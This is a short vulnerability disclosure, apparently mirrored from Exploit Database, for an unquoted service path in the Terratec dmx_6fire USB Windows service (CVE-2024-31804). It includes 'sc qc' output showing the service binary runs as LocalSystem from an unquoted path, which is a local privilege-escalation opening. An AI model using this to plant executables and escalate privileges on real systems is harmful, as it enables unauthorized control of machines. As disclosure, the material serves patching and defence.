Terratec dmx_6fire USB – Unquoted Service Path

• Exploit Database
• 139 阅读

• 作者： Joseph Kwabena Fiagbor
  日期： 2024-04-12
• 类别：

  • local
  平台：

  • windows_x86-64
• 来源：https://www.exploit-db.com/exploits/51977/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  # Exploit Title:Terratec dmx_6fire USB - Unquoted Service Path # Google Dork: null # Date: 4/10/2024 # Exploit Author: Joseph Kwabena Fiagbor # Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ # Software Link: # Version: v.1.23.0.02 # Tested on: windows 7-11 # CVE : CVE-2024-31804   1. Description:   The Terratec dmx_6fire usb installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.   2. Proof   > C:\Users\Astra>sc qc "ttdmx6firesvc" > {SC] QueryServiceConfig SUCCESS > > SERVICE_NAME: ttdmx6firesvc > TYPE : 10WIN32_OWN_PROCESS > START_TYPE : 2 AUTO_START > ERROR_CONTROL: 1 NORMAL > BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service > LOAD_ORDER_GROUP : PlugPlay > TAG: 0 > DISPLAY_NAME : DMX6Fire Control > DEPENDENCIES : eventlog >: PlugPlay > SERVICE_START_NAME : LocalSystem > >